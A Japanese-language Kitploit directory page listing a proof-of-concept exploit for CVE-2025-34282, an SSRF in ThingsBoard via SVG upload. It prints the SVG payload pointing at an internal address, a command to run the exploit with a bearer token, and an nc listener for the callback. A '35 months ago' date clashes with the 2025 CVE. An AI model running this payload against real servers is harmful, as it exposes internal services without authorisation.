Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
thingsboard-ssrf-cve-2025-34282 — CVE-2025-34282 用 PoC エクスプロイト - SVG 画像アップロード経由の ThingsBoard SSRF | Kitploit
ツール/GitHubGitHub/mathitam/thingsboard-ssrf-cve-2025-34282
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテストレッドチーミング
GitHubmathitam/thingsboard-ssrf-cve-2025-34282

thingsboard-ssrf-cve-2025-34282

CVE-2025-34282 用 PoC エクスプロイト - SVG 画像アップロード経由の ThingsBoard SSRF

リポジトリを見る
35ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-34282 — SVG画像アップロードを介したThingsBoard SSRF

概要

ThingsBoard IoTプラットフォームのバージョン4.2.1未満に存在するサーバーサイドリクエストフォージェリ (SSRF) の脆弱性です。

テナント管理者権限を持つ攻撃者は、画像アップロードギャラリーを介して、内部URL参照を含む細工されたSVGファイルをアップロードできます。ThingsBoardがSVGをサーバー側で処理すると、参照先URLをフェッチし、インターネットに公開されていない内部サービスへのアクセスを可能にします。

項目詳細
CVECVE-2025-34282
影響を受けるバージョン< 4.2.1
修正バージョン4.2.1
CVSSスコア6.9 中
CWECWE-918 (サーバーサイドリクエストフォージェリ)
ベンダーhttps://thingsboard.io

攻撃チェーン

  1. テナント管理者が悪意のあるSVGをPOST /api/imageにアップロードする
    • サーバーはSVGを処理し、埋め込まれたURLへのアウトバウンドリクエストを発行する
  2. SVGのpublicLinkを<object>タグ経由で埋め込むカスタムウィジェットが作成される
    • ウィジェットのレンダリングもサーバーサイドのフェッチをトリガーする

SVG ペイロード

ssrf_localhost_5555.svg ペイロードは、内部URL参照を埋め込んでいます:

root@kitploit:~
<image xlink:href="http://127.0.0.1:5555" x="0" y="0" width="600" height="450" />

アップロードされると、ThingsBoardのサーバーはhttp://127.0.0.1:5555をフェッチし、SSRFを確認します。

使用方法

必要条件:

root@kitploit:~
pip install requests

実行:

root@kitploit:~
python thingsboard_4.2.0_ssrf_CVE-2025-34282_exploit.py <svg_file> <bearer_token>

例:

root@kitploit:~
python thingsboard_4.2.0_ssrf_CVE-2025-34282_exploit.py ssrf_localhost_5555.svg eyJhbGci...

エクスプロイトを実行する前に、SSRF コールバックをキャッチするリスナーを起動してください:

root@kitploit:~
nc -l 5555

参照

  • https://www.cve.org/CVERecord?id=CVE-2025-34282

著者

Tamil Mathi T.

ツールをダウンロード